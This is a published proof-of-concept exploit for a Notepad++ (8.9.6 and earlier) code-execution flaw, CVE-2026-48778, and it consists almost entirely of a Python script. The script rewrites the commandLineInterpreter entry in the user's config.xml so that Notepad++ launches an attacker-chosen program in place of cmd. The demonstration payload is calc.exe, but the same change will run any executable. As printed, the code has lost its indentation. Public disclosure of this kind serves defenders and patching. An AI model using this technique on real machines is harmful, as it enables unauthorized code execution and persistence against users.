# Exploit Title: Notepad++ 8.9.6 - Arbitrary Code Execution
# Date: 2026-05-30
# Exploit Author: Kavin Jindal (Avyukt Security) https://www.linkedin.com/in/kavin-jindal/
# Vendor Homepage: https://notepad-plus-plus.org
# Software Link: https://notepad-plus-plus.org/downloads/v8.9.6/
# Version: <= 8.9.6
# Tested on: Windows 10/11
# CVE: CVE-2026-48778
# Reference: https://github.com/notepad-plus-plus/notepad-plus-plus/security/advisories/GHSA-7hm3-wp5q-ccv9
#
# Description:
# Notepad++ reads <GUIConfig name="commandLineInterpreter"> from config.xml without
# validation and passes it to ShellExecute when "Open Containing Folder in cmd" is
# triggered. An attacker with write access to %APPDATA%\Notepad++\ can inject an
# arbitrary executable path, resulting in code execution under the current user context.
# In the following script, `calc.exe` has been used to demonstrate this vulnerability.
import os, sys
appdata = os.environ["APPDATA"]
if not appdata:
print("[!] APPDATA environment variable not found, exiting..")
sys.exit()
config_path = os.path.join(appdata, "Notepad++", "config.xml")
existing = os.path.exists(config_path)
if existing==True:
print("[+] Found config.xml at ", config_path)
else:
print("config.xml not found. Ensure Notepad++ is installed and has been launched atleast once.")
x = open(config_path, 'r')
s = x.readlines()
payload='<GUIConfig name="commandLineInterpreter">calc.exe</GUIConfig>\n'
injected=False
for num,i in enumerate(s, start=0):
if '<GUIConfig name="commandLineInterpreter">' in i:
print("[!] Injecting payload..")
s[num]=payload
injected=True
break
elif "</GUIConfigs>" in i:
print("[!] Injecting payload..")
s.insert(num, payload)
injected=True
break
if not injected:
print("[!] Payload injection failed.")
sys.exit(1)
y = open(config_path, 'w')
y.writelines(s)
print("[+] Payload injected successfully!")
print("[+] Testing: Open Notepad++ > File > Open Containing Folder > cmd")
print("[+] Calc.exe will launch instead of cmd.")
print("end")
